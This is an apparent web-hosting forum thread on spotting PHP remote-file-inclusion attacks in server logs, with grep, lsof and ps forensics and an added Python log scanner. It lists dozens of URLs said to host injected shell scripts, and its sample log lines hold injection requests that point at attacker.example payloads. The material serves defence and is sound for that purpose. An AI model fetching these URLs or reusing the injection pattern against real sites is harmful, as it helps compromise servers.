To check for possible hack/shell attempts

gerrybakker (Verified User; joined Apr 24, 2004; 54 messages)
To check for possible hack/shell attempts: this search will identify the domains that had PHP injection used against them to try to run a script remotely. If it works, the hacker has a SHELL with root access even without the password; if not, the site will simply ignore what happened.
If your script is hackable, then update the script immediately to the latest version or find the patch that closes the hole.

I found live shells operating on some sites when I researched the results. First I run the remote URL all by itself, which usually reveals the tool that was going to be injected. If I then concatenate the user site URL and the remote string, I get to see what they had accomplished. Sometimes the URL looks like an invalid gif or jpg; "view source" on that page and you'll see a nasty PHP script hidden behind that innocent-looking error screen.

cd /var/log/httpd/domains/
grep "path=" *.log

grep "path=" *.log | mail -s "possible hacks on my Server" [email protected]

It uses PHP injection scripts to load a SHELL onto the server through your site.

Here are the remote scripts that were run against my server in the last 24 hours. Some are nasty and some are useless, but every one of them is scary if you don't have your PHP-based sites properly patched against this exploit. A number of them are duplicates and were run hundreds of times against popular sites using Mambo, Joomla, Gallery, phpBB and others. This goes on every day. One of these was used against one vulnerable script by 100's of simultaneous hackers from around the world using it to set up IRC bots and SPAM relays. Bottom line: check your server's logs as I did and you may find yourself a bit busy cleaning things up.

Warning: these are all PHP scripts, so don't take a peek if you have PHP running on your desktop.

www.lasexta.net/templates/id.txt
indiablo.altervista.org/id.txt
www.tokyowww.com/alat/echo?
www.sunrunnerveterans.com/modules/Forums/phpmic.txt.txt
www.kolortavil.org/Connections/ok.txt
www.myviralspiral.com/forms/id.txt
destra.ca/s
projects.papanature.net/includes/cmd.txt
intranet.stantonmortgage.com/includes/pen.jpg
k-a.ru/ngl.gif
www.clan-ict.com/administrator/components/com_datsogallery/images/id.txt
rodda.ca/aan/info.txt? HTTP/1.0
www.servolinux.com.ar/mambo/images/zoom/pepe1/od2069.txt
www.lasexta.net/components/rm.txt
www.underground-revue.com/info.txt
www.zarha.org/pr.txt
82.177.24.73/~darek/safe.txt
englishforbusinessonline.com/tool20.dat
www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
www.osrm.ch/~ChHelbli/counterfolder/data/idmic2.txt
www.superlab.jazztel.es/safe.gif
www.modelismo.alternativo.nom.br//poll/polldata/readme.txt
claroline.lct-net.cl/id
www.myviralspiral.com/forms/id.txt
www.turboshells.us/spread.txt
www.lostwarriors.com//vwar/convert/main.txt
www.tegatani.org/images/ec.txt
img86.imageshack.us/img86/8232/idrc1.gif
cms.alm.cc/contenido/cronjobs/id.txt
speakerformula.com/speakerformula/cmd.txt
balcanhosting.com/id.txt
baguscrew.net/alat/cmd.txt
aspato-go.com/cartt/images/echo.txt
asaba.com/personals/pictures/temp
oz-star.com/remot.txt
www.pirateindustries.co.uk/smf/Themes/safe.txt
www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
projects.papanature.net/includes/cmd.txt
www.kolortavil.org/Connections/ok.txt
rampagingsoldiers.com/themes/Lexus-Blue/vuln.gif
www.mta.cl/galeria2/galery.txt
64.92.163.162/~myspaceg/images/help.txt
www.aeria.gr/gallery//photos/1/13419207/id.txt
www.avelectronics.ca/cal//ws/cmd.txt
www.zavod-avtosvet.ru//components/com_forum/cmd.txt
www.aeria.gr/gallery//photos/1/13419207/id.txt
www.feuerwehr-roedelmaier.de/dasepp_php_gb/id.txt
intranet.stantonmortgage.com/includes/pen.jpg
www.clan-ict.com/administrator/components/com_datsogallery/images/id.txt
estballet.ee/media/cmd.txt
www.modelismo.alternativo.nom.br//poll/polldata/readme.txt
indiablo.altervista.org/id.txt
askastro.com/bo.do
lamerinside.altervista.org/id.txt
www.apropertysolution.com/administrator/modules/bonek.txt
eventtoday.com/bbs/skin/gallery_thum/safe.txt

Remember that this is not a finite list; it is only a sampling of one server in one day, but it should help bring home the point that every script on any site must be constantly updated.

FYI - we did have all the server hardening features in place and this type of thing still happened but thankfully the hackers couldn't really ruin the server as much as just load it down with their activities.
 
cd /var/log/httpd/domains/
grep "path=" *.log
I see how this works, but if I understand correctly all it does is indicate attempts.

When we see such attempts do we have to notify all these users that they need to make sure their sites are updated?

Can you give us insight as to what we have to look at on the site on our server to see if it's been hacked?

Do you think we should always run a local desktop (linux?) that doesn't have php installed on it, so we can look at these?
FYI - we did have all the server hardening features in place and this type of thing still happened but thankfully the hackers couldn't really ruin the server as much as just load it down with their activities.
Can you give us an idea as to what you consider server hardening features?

Thanks.

Jeff
 
I'm interested too (surely not the only one besides Jeff), to hear more!
 
I ran in circles trying to find these potential hacks and after lots of googling came up with this series of steps to narrow down the possible intrusions. Notifying everyone on the server would have been a big job so here is how I narrowed it down to the one that actually got through.

If the server is running a rogue process - don't kill it yet.

If the attacker is not that smart or isn't hiding it, a simple command run against the suspect process ID (in this example 23977 is the process ID number)

# lsof -p 23977

will show the location of the script used to start the process which will quickly show you which user and folder the hackable script is in as well as all of the commands run against this process. Amazing really.

lsof is a command meaning "list open files", which is used to report a list of all open files and the processes that opened them.

An alternative and simpler command is:
The /proc filesystem will tell you (among other things) where the executables are, by way of a symlink, which can be very handy. For example, running this command as root should tell you where the executable is located:

# ls -l /proc/9713/exe

I like the first example better - more informative.

Once you have narrowed the suspect down to the appropriate folder - check the files that are in it to get acquainted with them for the next step.

Using
# ps aux
Check the exact date and time the script was started. Then go to the domain logs and run this command to look for all the log entries for that specific time and domain name.

cd /var/log/httpd/domains/
grep "03/Nov/2007:06:45:" suspectdomain.log

(You'll notice I didn't enter the seconds, only the minute I was looking for.) Sure enough, I got a log entry at that specific minute against a specific script in the suspect folder. Then by checking support forums for that script I found it was exploitable and applied the appropriate fix as suggested by that script community. The log entry also showed the remote script they were injecting into the PHP script. I checked out the remote script and could see what they were trying to do to my server, and sure enough I could find the files they dropped where the script said they would be.

Once the rogue process has been identified and you've figured out which script is at fault KILL the rogue process and fix the faulty script problem.

You asked - which server hardening features? I applied most of the suggested techniques in
ELS - Easy Linux Security script
http://directadmin.com/forum/showthread.php?t=17070&highlight=els

I didn't feel comfortable running the automatic ELS script but I manually did most of it to my liking. It would be great if there was a DirectAdmin version of this script because the script was written for a cpanel install and there are enough differences to break a DirectAdmin install if blindly applied in automatic mode.
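The two log checks described in this thread (the grep for "path=" in the domain logs, and the later grep for one specific minute to tie a rogue process back to the request that started it) can be done in one small scanner. The following is an added example, not code from the thread or from gerrybakker, and it goes slightly beyond the original grep: it parses each Apache combined-format line, inspects every query parameter rather than only one named "path", and reports any value that is an http, https or ftp URL. The sample log lines are constructed for the example; attacker.example and the 203.0.113.x, 198.51.100.x and 192.0.2.x addresses are reserved documentation placeholders, and the parameter names are made up.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format (not taken from the thread).
# Hosts and addresses use reserved documentation ranges; parameter names are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Nov/2007:06:45:12 -0500] "GET /index.php?option=com_content&path=http://attacker.example/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [03/Nov/2007:06:45:40 -0500] "GET /gallery/index.php?page=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Nov/2007:07:02:03 -0500] "GET /forum/admin/config.php?include_path=http://attacker.example/id.txt HTTP/1.0" 404 310 "-" "libwww-perl/5.805"
192.0.2.4 - - [03/Nov/2007:08:15:00 -0500] "GET /poll/index.php?dir=ftp://203.0.113.50/safe.gif HTTP/1.1" 200 100 "-" "Mozilla/4.0"
"""

# ip ident user [timestamp] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)
# A query-string value that starts with a remote scheme is what a remote-include
# attempt looks like in the access log.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Split one combined-format log line into its fields; None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_rfi_attempts(log_text):
    """Return every request whose query string hands a remote URL to a script.

    This generalises the thread's grep "path=": every parameter name is checked,
    so variants such as dir=ftp://... are caught too. A 200 status only means the
    script answered; it does not by itself prove the include was executed.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append({
                    "ip": rec["ip"],
                    "when": rec["when"],
                    "script": parts.path,      # the local script that was targeted
                    "param": name,             # the parameter carrying the remote URL
                    "remote_url": value,
                    "status": rec["status"],
                })
    return hits


def entries_at_minute(log_text, minute):
    """Lines stamped within one minute, e.g. minute="03/Nov/2007:06:45".

    Same idea as the thread's grep with the seconds left off: once ps shows when a
    rogue process started, this pulls the requests from that minute.
    """
    needle = "[" + minute + ":"
    return [line for line in log_text.splitlines() if needle in line]


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        print(f'{h["when"]:%d/%b/%Y:%H:%M:%S} {h["ip"]} {h["script"]} '
              f'{h["param"]}= {h["remote_url"]} (status {h["status"]})')
    print("--- requests in the minute the process started ---")
    for line in entries_at_minute(SAMPLE_LOG, "03/Nov/2007:06:45"):
        print(line)
```

On a real server you would read the files under /var/log/httpd/domains/ instead of SAMPLE_LOG; the "script" field then tells you which user's folder to inspect, and the timestamp is what you match against the start time ps reports for the suspect process.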
 
OK, GB. A little help for the little guy?

OK, gerry, not to sound like a neanderthalic nincompoop, but is there some way you could make that a little simpler for someone who might not be on the same plane of programmatics as you and Mr. Lasman there? I'm just barely getting up to speed on using the DirectAdmin system in regards to website construction/folder file placement/program functions. I just recently got hacked (and by the tenor of the thread conversation, rightly a timely subject), and I'm trying to find out EXACTLY how I can find out about this so I can stop it from happening down the road in the future. I'm REALLY tryin' to follow you, but it's all translating to Martian for all well as I know. Is there a more base understanding level that can be applied to the discussion? Or am I going to have to catch a headache in the future and really get to grips with the coding syntax? I don't have any problems with learning new things, but in all reality, gentlemen, I have about 55 million things that have to be attended to all at the same time and I need to understand what the HELL is going on so I can fix my problem and get back to business (as I was so rudely interrupted by a defacement of a shark's snout as my welcome face to the digital world - thanks a lot whoever you are YOU ASSFACED HACKER ****!!!!! And don't tell me crap about that you wouldn't even be mad if it happened to you, AND YOU DON'T EVEN GET TO SEE IT?!?!??!!? That's really chappin' my ass HARD, right now chief. I just registered my domain.........damn). So's anyway guys what can be done, here? I REALLY don't want to have to transfer to my sub-domain again (HIGHLY-RELIABLE, SUPER SPACE, SUPER SAFE, but no sense of "my own address").
 
TKY_Publishing, you're probably not going to like my response.

I'm sorry if you don't understand the answers on the forums, but we're all volunteers here; you get what you get.

If you got hacked and you don't want your hacked server to be used for lots of bad things including criminal acts, you'd better stop doing those 55 million other things and start working on your server.

Or hire someone to do it for you.

Jeff
 
At this time ProFTPD offers no real-time options for protection due to the way their application is designed.

Upload Guardian still offers web-based upload protection and the usual cron and manual scan protection at your fingertips.
 